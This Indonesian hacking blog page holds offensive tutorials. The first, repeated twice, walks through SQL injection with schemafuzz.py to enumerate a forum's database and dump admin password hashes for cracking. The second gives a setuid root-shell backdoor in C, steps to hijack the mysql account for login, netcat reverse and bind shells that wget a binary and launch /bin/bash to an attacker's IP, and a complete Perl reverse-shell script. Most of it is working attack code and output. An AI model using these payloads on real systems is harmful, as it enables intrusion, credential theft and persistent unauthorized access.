Tampilkan postingan dengan label attack. Tampilkan semua postingan
Tampilkan postingan dengan label attack. Tampilkan semua postingan

Sabtu, 07 Agustus 2010

Tutorial SQL Injection dengan Menggunakan Schemafuzz.py

by :andre81
Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.

ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut pertama-tama kita cari target dengan google dan ditemukan: misalnya

http://127.0.0.1/site/phpweb/forum.php?forum=1

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

caranya seperti ini

./schemafuzz.py -h help

kita temukan sebagian perintahnya seperti ini

--schema, --dbs, --dump, --fuzz, --info, --full, --findcol

langkah pertama
——————
/schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--
[+] Evasion Used: "+" "--"
[+] 01:32:04
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[-] Done!

langkah kedua
————–
setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

/schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:37:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Number of tables names to be fuzzed: 354
[+] Number of column names to be fuzzed: 263
[+] Searching for tables and columns...
[+] Found a table called: mysql.user
[+] Now searching for columns inside table "mysql.user"
[!] Found a column called:user
[!] Found a column called:password
[-] Done searching inside table "mysql.user" for columns!
[-] [01:37:48]
[-] Total URL Requests 618
[-] Done

langkah ketiga
—————
Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

/schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:43:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing Tables & Columns from database "webthings"
[+] Number of Tables: 33
[Database]: webthings
[Table: Columns]
[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views
[1]wt_articles_title: article_id,category,title,active,date,userid,views
[2]wt_articlescat: cod,category
[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date
[4]wt_banners_log: banner,date,views,clicks,sessions
[5]wt_banners_rawlog: banner,type,date,session
[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_bo
[7]wt_comments: cod,type,link,date,userid,comment
[8]wt_config: id,config
[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text
[10]wt_downloadscat: cod,ref,name,descr
[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer
[12]wt_faq_topics: cod,name
[13]wt_forum_log_topics: uid,msgid,logtime,notifysent
[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies
[15]wt_forums: cod,title,descr,locked,notifies,register
[16]wt_forums_mod: forum,userid,type
[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst
[18]wt_links: id,category,active,name,url,count,descr,obs
[19]wt_linkscat: cod,name,descr,parent_id
[20]wt_menu: id,pos,title,url,type,newwindow,lang
[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos
[22]wt_newscat: cod,name,image
[23]wt_online: id,time,uid
[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks
[25]wt_picofdaycat: id,name,description
[26]wt_picofdaysel: date,picture_id,views,clicks
[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10
[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules
[29]wt_user_access: userid,module
[30]wt_user_book: userid,cod_user
[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify
[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail
[-] [01:43:48]
[-] Total URL Requests 270
[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info

maka akan tampil seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:46:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--
[+] Do we have Access to Load_File: No
[-] [01:46:51]
[-] Total URL Requests 3
[-] Done

ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dbs
akan tampil seperti ini

Artikel Community

Tutorial SQL Injection dengan Menggunakan Schemafuzz.py
Oleh andre81
Published: Desember 2, 2008
Updated: Desember 6, 2008
Print

Tutorial SQL Injection dengan Menggunakan Schemafuzz

-----------------------------------------------------

Author : Andr3^81

e-Mail : andr3-81 [at] linuxmail [dot] org

website : http://andr381.tk

Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de

tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.

ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut

pertama-tama kita cari target dengan google dan ditemukan:

misalnya

http://127.0.0.1/site/phpweb/forum.php?forum=1

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

caranya seperti ini ./schemafuzz.py -h help

kita temukan sebagian perintahnya seperti ini

--schema, --dbs, --dump, --fuzz, --info, --full, --findcol

langkah pertama

----------------

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--

[+] Evasion Used: "+" "--"

[+] 01:32:04

[+] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,3,4,5,

[+] Column Length is: 6

[+] Found null column at column #: 1

[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--

[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

[-] Done!

langkah kedua

--------------

setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:37:09

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Number of tables names to be fuzzed: 354

[+] Number of column names to be fuzzed: 263

[+] Searching for tables and columns...

[+] Found a table called: mysql.user

[+] Now searching for columns inside table "mysql.user"

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table "mysql.user" for columns!

[-] [01:37:48]

[-] Total URL Requests 618

[-] Done

langkah ketiga

---------------

Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:43:11

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing Tables & Columns from database "webthings"

[+] Number of Tables: 33

[Database]: webthings

[Table: Columns]

[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

[1]wt_articles_title: article_id,category,title,active,date,userid,views

[2]wt_articlescat: cod,category

[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

[4]wt_banners_log: banner,date,views,clicks,sessions

[5]wt_banners_rawlog: banner,type,date,session

[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

[7]wt_comments: cod,type,link,date,userid,comment

[8]wt_config: id,config

[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text

[10]wt_downloadscat: cod,ref,name,descr

[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

[12]wt_faq_topics: cod,name

[13]wt_forum_log_topics: uid,msgid,logtime,notifysent

[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies

[15]wt_forums: cod,title,descr,locked,notifies,register

[16]wt_forums_mod: forum,userid,type

[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

[18]wt_links: id,category,active,name,url,count,descr,obs

[19]wt_linkscat: cod,name,descr,parent_id

[20]wt_menu: id,pos,title,url,type,newwindow,lang

[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos

[22]wt_newscat: cod,name,image

[23]wt_online: id,time,uid

[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

[25]wt_picofdaycat: id,name,description

[26]wt_picofdaysel: date,picture_id,views,clicks

[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10

[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

[29]wt_user_access: userid,module

[30]wt_user_book: userid,cod_user

[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,

newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]

[-] Total URL Requests 270

[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info

maka akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"

[+] 01:46:51

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t

[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--

[+] Do we have Access to Load_File: No

[-] [01:46:51]

[-] Total URL Requests 3

[-] Done

ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe

untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs

akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"
[+] 01:58:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhos
Version: 5.0.51a
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] webthings
[-] [01:58:17]
[-] Total URL Requests 30
[-] Done

langkah selanjutnya
——————–
cara untuk menemukan user dan password kita gunakan perintah –dump -D namadatabase -T namatabel -C namakolom
setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini
./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –dump -D webthing -T wt_users -C name,password

eing ing eng….jreennnng….keluar deh user ama passwordnya
hasilnya dibawah ini

+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

[+] Evasion Used: "+" "--"
[+] 02:08:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Dumping data from database "webthings" Table "wt_users"
[+] Column(s) ['name', 'password']
[+] Number of Rows: 2
[0] admin:e00b29d5b34c3f78df09d45921c9ec47:
[1] user:098f6bcd4621d373cade4e832627b4f6:
[-] [02:08:48]
[-] Total URL Requests 4
[-] Done

angan lupa kita selalu mengecek schemafuzzlog.txt nya setelah itu tinggal kita meng crack passwordnya pake program gemana rekan2 gampang kan pake schemafuzz

NB:
Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya Ingat kita jgn terlalu dimanjakan dengan program yang siap pakai, sebab kita gak ngerti dasar-dasarnya, asal-usulnya…

program tersebut hanya bertujuan untuk membantu kita apabila kita tidak menemukan sesuatu yang muncul dalam site target.

PERHATIAN!!!! jangan merusak, jadikan tutorial ini sebagai embelajaran bagi para admin maupun yang pengen belajar sql injection serta newbie seperti saya Tulisan ini silahkan di copas dengan menyertakan kredit pengarangnya.
a

backdooring on root

[color=#FF4500][size=x-large]Backdooring[/size][/color]

banyak yang tanya, giman sih backdooring root itu, apa sih backdoor itu, bla….bla….blaa…… bahkan ane sendiri sering nanya2 and browsing2 hehehe maklum masih cupu, setelah ane explore di mbah google ternyata banyak yang menjelaskan opo to kui backdoor ? ok langsung deh, malah curhat jadinya,


sumber :
ExploreCrew, SecurityFokus, Hackown,inject0r,ech0, & google
Terimakasih sebanyak2nya

Root Backdooring ? opo to iki ?

Root :user yang berhak atas system secara penuh (dewa dalam system)

Back : belakang (dah pada tau ya hehehe)

Door : Pintu (apalagi ini :( mesti wes ngerti kabeh)

kesimpulannya Root backdooring adalah : mencari pintu masuk ke target mealui jalan belakang sebagai user yang mempunyai akses penuh terhadap system




ada bebrapa cara bahkan mungkin banyak cara untuk melakukan backdooring, cuman ane ga tau semua heheheh kan ane masih cupu,

1. SSHDoor

download sshDoor ke target (asumsi di target kita udah ada shell), cari di mbah google mesti nemu banyak, download dengan perintah

wget, curl, wp-download atau terserah pake cara apa yang penting sshDoor da di target

Extract sshdoor.tzg , Masuk ke Dir sshdoor, et permission semua File, nstall sshdoor

tar -zxvf sshdoor.tgz
chmod 777 * -R
./install [password_kita] [port_kompi_kita]

kalo dah selesai install, qt cek bind ke port yg telah di install ssh door

telnet ke target dari kompi kita


telnet 000.000.000 1111 << IP dan port target

kalo ada pesan connected artinya dah sukses, tinggal kita connect pake ssh dengan user dan port yang udah kita tentukna pada saat nginstal sshDoor tadi

2. RSH

:( opo maneh iki xixixiix

ane juga ga tau, dah nyari tapi lom ketemu heheheheh, pokoknya intinya kalo kita dah dapet akses root di target tapi ga bisa ngapa2in Asumsinya kita akan melakukan koneksi ke target dengan user lain namun dengan akses setara root di port standar SSH target.

sama kek yang pertama kita download dulu script RSHnya kalo ga ya buat new file pake shell kita trus paste script ini

#include
#include
#include
int main()
{
    system("echo  ");
    system("echo -==[ Root Shell Backdoor ]==-\r\n");
    system("echo -==[ Explore Crew UnderGround ]==-\r\n");
    system("echo -==[ www.ExploreCrew.Org ]==-\r\n");
    system("echo  ");
    system("echo Starting Interactive Shell...\r\n");
    system("echo Session Started. Enjoy the hack !!");
    system("echo  ");
    setuid(0);
    setgid(0);
    setgroups(0,0);
    system("su");
    system("exit");
    return 0;
}

ubah nama file jadi rsh.c, compail, set permision, ubah passwd user mysql , rubah alamat shell user mysql ke /bin/bash , Pindahkan File main ke direktory /bin,

mv rsh rsh.c
gcc -o main rsh.c
chmod gu+s main
chmod o+x main
passwd mysql
chsh -s /bin/bash mysql
mv main /bin/

oke setelah itu coba login via putty untukkonek ke port ssh standard target.. login dengan user mysql, pass sesuai yg dirubah tadi..

[color=#FF4500][size=x-large]Connect Back Shell[/size][/color]

Connect Back Shell atau lebih akrab disebut Backconnect adalah melakukan remote dari komputer sasaran ke komputer kita

Backconnect adalah sebuah alternatif bila bindshell gagal, ntah karena gak punya akses, denied akses, sekurity dari firewall, atau karena komputer sasaran tertutup oleh proxy server (komputer sasaran berada di dalam network yang tertutup oleh proxy). Bila ada proxy di depan komputer sasaran, walau bind berhasil, namun kita tetap tidak bisa melakukan remote konek ke sasaran karena tertutup komputern proxy.

Ketika kita melakukan koneksi, maka koneksi kita akan di tolak karena port yg kita tuju tidak terbuka di firewall. Firewall menolak semua koneksi/request ke port yang tidak dibuka di firewall tersebut. Paket-paket berisi request yang di kirim oleh attacker tidak bisa melewati dinding firewall karena memang jalur tidak terbuka, sehingga request koneksi tidak pernah sampai di komputer sasaran.

D:\HACK>nc -vv 192.168.10.10 1968
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA
[192.168.10.10] 1968 (?): connection refused
sent 0, rcvd 0: NOTSOCK

Kasus lain, adalah bila komputer sasaran berada di dalam internal network, yang mana network tersebut tertutup oleh proxy server. Dalam hal ini, proxy server bertindak sebagai gateway network yang ada di dalamnya.

Ketika attacker berhasil binding port di komputer sasaran yang ada di dalam proxy, attacker tetap tidak bisa melakukan remote connection karena port tidak terbuka di komputer proxy. Proxy mengatur lalu lintas data dari port-port yang di seting di proxy untuk di teruskan ke ip dan port yang ada di internal network nya. Ketika attacker binding port di komputer yang di dalam proxy, di proxy tidak pernah di set port yg mengarahkan service ke komputer sasaran melalui port yang di bind. Sehinga proxy akan menolak koneksi ke port yang di minta attacker, karena proxy memang tidak pernah mengenali service pada port yg di minta attacker.

Percobaan koneksi yang akan kita terima adalah seperti berikut :

D:\HACK>nc -vv 192.168.10.10 1968
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA
[192.168.10.10] 1968 (?): connection refused
sent 0, rcvd 0: NOTSOCK

Bagaimana kita mendapatkan koneksi ke komputer sasaran sementara di depan komputer sasaran ada bodyguard yang selalu memukul dan meluluh-lantak-kan setiap koneksi yang di minta dari luar yang tidak di kenal? Inilah dia. BackConnect.

Seperti yang saya katakan. Backconnect adalah membalikkan koneksi dari komputer sasaran ke komputer attacker yang telah listening pada port tertentu, dengan membawa/meluncurkan aplikasi tertentu, dalam hal ini (hacking) yang akan kita luncurkan (diluncurkan dari sasaran) adalah /bin/bash.


Sehingga ketika komputer sasaran melakukan koneksi ke komputer attacker, komputer attacker akan menerima koneksi, dan akan membuka dan mengaktifkan aplikasi yang di luncurkan oleh komputer sasaran, dalam hal ini adalah /bin/bash. Dengan demikian, attacker mendapatkan akses interaktif /bin/bash dari komputer sasaran. It is interactive console.

[b]BackConnect dengan NetCat[/b]

Untuk bisa melakukan backconnect, maka ip yang kita pakai haruslah ip public, atau ip yang terkoneksi langsung ke internet tanpa penghalang proxy.Cara melakukan backconnect sangat mudah, semudah bindshell. Yang perlu kita lakukan pertama kali adalah set mode listening di komputer kita. Hanya set mode listening, tanpa aplikasi apapun, karena kita akan menerima aplikasi yang diluncurkan oleh kompi sasaran.

[root@localhost][/root] nc -vlp 6888

listening on [any] 6888 …

Sip. Kompi kita udah listening. Berikutnya kita koneksikan komputer sasaran ke komputer kita dengan meluncurkan aplikasi /bin/bash. Seperti biasa, harus ada netcat di kompi sasaran. Downloadkan dulu netcat ke kompi sasaran. Simpan di direktory yg writeable. Atau langsung aja ke /tmp.

Command untuk backconnect adalah: nc –vv [ip attacker] [port] –e [launch aplication]
cd /tmp
wget http://hacking.tool/nc
chmod 777 nc
./nc –vv 192.168.10.20 6888 –e /bin/bash

Setelah menjalankan command tersebut di komputer sasaran, sekarang lihatlah komputer kita. Kita sudah mendapatkan koneksi balik dari komputer sasaran dan langsung menerima aplikasi yg diluncurkan oleh komputer sasaran ke komputer kita.

[root@localhost][/root] nc -vlp 6888
listening on [any] 6888 ...
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 43886
id
uid=48(nobody) gid=48(nobody) groups=48(nobody)
uname –a
Linux  astra.2014.ws  2.6.18-164.el5  #1  SMP  Thu  Sep  3  03:28:30  EDT  2009
x86_64 x86 _64 x86_64 GNU/Linux

Nah, kan. Kita mendapatkan interaktif console melalui teknik backconnect. Selanjutnya, ya terserah kita mau apa. Obok-obok sampe puas pastinya.

Kalau komputer sasaran adalah windows? Sama aja bos. Hanya aplikasi yang diluncurkan adalah cmd.exe

c –vv 192.168.10.20 6788 –e cmd.exe 

Kemudian kita lihat di komputer kita yang tadi sudah kita set listening.

[root@localhost][/root] nc -vlp 6788
listening on [any] 6788 ...
192.168.10.10: inverse host lookup failed: Unknown host
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 59681
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Windows>  <<< dapat!!! Kita telah mendapatkan cmd.exe di komp sasaran
C:\Windows>ipconfig   <<< tes lihat ip
ipconfig

Windows IP Configuration
PPP adapter:
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.10.10
        Subnet Mask . . . . . . . . . . . : 255.255.255.255
        Default Gateway . . . . . . . . . : 192.168.10.100

D:\Windows>  

udah dpt console interaktif. Selanjutnya tinggal command-command sesuka kita.

[b]BackConnect.pl (Backconnect dengan aplikasi perl)[/b]

fungsinya, jelas untuk melakukan backconnect dengan aplikasi perl. Karena ditulis dengan perl, maka aplikasi ini membutuhkan perl juga di komputer sasaran. Bagaimana ngecek nya kalau user kita bisa jalankan perl? Seperti yang dulu, tetep perl –v. Gak perlu panjang lebar, langsung in action.

Set mode listening di komputer kita.

nc –vlp 9999 

Kemudian, kita download backconnect.txt yang sudah kita upload ke hosting kita ke komputer sasaran, di direktory yang writeable tentunya. Seperti biasa pula, langsung menuju /tmp.

Cara pakai backconnectnya: perl backconnect.txt [ip] [port]

cd /tmp
wget http://hacking.tool/backconnect.txt
perl backconnect.txt 192.168.10.20 9999 &

Setelah menjalankan command ini di komputer korban, kembali ke komputer

kita. Dan lihat,kita dapat console sang korban.

[root@localhost][/root] nc -vlp 9999
listening on [any] 9999 ...
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 44808
Linux astra.2014.ws 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009
x86_64 x86_64 x86_64 GNU/Linux
uid=48(nobody) gid=48(nobody) groups=48(nobody)
pwd
/tmp
whoami
apache

ini script backconnect perlnya

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

[color=#FF4500][size=x-large]Bind Shell[/size][/color]

Bindshell adalah membuka port (binding) pada komputer korban dengan mengikutkan service/aplikasi yang akan melayani koneksi yang di terima dari port yg di buka. Umumnya aplikasi yang di pakai adalah /bin/bash. Sehingga ketika terjadi koneksi ke port yg di buka, maka komputer korban akan menjalankan aplikasi /bin/bash dan meluncurkannya kepada attacker. Disebut bindshell karena bind di lakukan dengan memberikan service shell (/bin/bash). Dengan demikian, attacker yg melakukan koneksi ke port yg di bind tersebut, akan mendapatkan /bin/bash dari komputer korban. It is a interactive console.

Banyak metode untuk melakukan bindshell. Berikut beberapa contoh teknik melakukan bindshell dengan menggunakan netcat dan aplikasi perl.

[b]Bindshell dengan NetCat[/b]

Kita implementasikan komputer korban memiliki ip address 192.168.10.10 Sedangkan komputer kita, memiliki ip address 192.168.10.20 Banyak yang bertanya, bagaimana menjalankan command tersebut di komputer sasaran? Banyak cara, yang jelas kita harus mendapatkan akses ke komputer korban atau bisa menjalankan command ke komputer korban, misalnya kita punya webshell di komputer korban, atau ninja bayaran kita sudah siap sedia di komputer korban untuk menjalankan perintah kita. Intinya kita harus bisa mengirimkan perintah ke komputer korban, baik melalui rfi, webshell, lfi, rce, dll.

Langsung kita bind komputer sasaran kita. Pastinya file netcat (nc) harus ada di komputer yang akan kita bind. Jadi kita harus download dulu file nc ke komputer sasaran. Banyak command untuk download. Salah satunya adalah wget.

Masuk ke direktory yang writeable. Gak perlu lama-lama. Langsung masuk /tmp. Direktory ini udah tentu writeable.

cd /tmp
Dowload netcat
wget http://haking.tool/nc
Set permission executable pada nc
chmod 777 nc
Bindshell
./nc –v –l –p 4444 –e /bin/bash &

Sampai disini, kita telah melakukan bind ke port 4444 dengan srvice aplikasi /bin/bash. Tanda “&” di belakang command akan membuat bind dijalankan secara background (daemon process).

Cara termudah untuk ngecek apakah bindport berhasil, lakukan telnet ke host sasaran pada port yg kita bind tadi. Bila anda mendapati pesan “connected” or blank, menunjukkan anda sudah konek ke port yg kita bind. Dengan demikian, bind port yg kita lakukan berhasil.

Perlu di ingat, bahwa netcat adalah sekali konek. Ketika ada koneksi, setelah itu port tidak lagi terbuka, termasuk ketika ngecek dengen telnet. Untuk itu, lakukan sekali lagi kalau mau konek ke console.

Trus gimana cara melakukan remote conection pada komputer yg telah di bind? Pakai netcat. Tentunya harus punya netcat di komputer kita. Command untuk remote connect dengan netcat sangat simple.

nc –vv [ip host sasaran] [port]
D:\HACK>nc -vv 192.168.10.10 4444
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA
[192.168.10.10] 4444 (?) open

Perhtikan pesan “open” pada port. Itu menunjukkan kalau port terbuk. Cursor yang berpindah ke bawah (seperti blank tidak ada apa apa), itu bukan blank, tapi itu adalah console yang kamu dapatkan melalu bind port dengan netcat. Kita bisa langsung jalankan command-command disini.

D:\HACK>nc -vv 192.168.10.10 4444
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA
[192.168.10.10] 4444 (?) open
id   <<< command
uid=100(nobody) gid=101(nobody) groups=101(nobody) context=user_u:
pwd  <<< command
/tmp
uname -a
Linux bajaj.mempreng.com 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST
2007 i686 i686 i386 GNU/Linux

Namun, bila beruntung kita akan mendapatkan tmpilan console dengan prompt console dari linux.

D:\HACK>nc -vv 192.168.10.10 4444
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA
[192.168.10.10] 4444 (?) open
ash-3.2$ id
uid=100(nobody) gid=101(nobody) groups=101(nobody) context=user_u:
bash-3.2$ pwd
/var/lib/mysql
bash-3.2$ uname -a
Linux bajaj.mempreng.com 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST
2007 i686 i686 i386 GNU/Linux

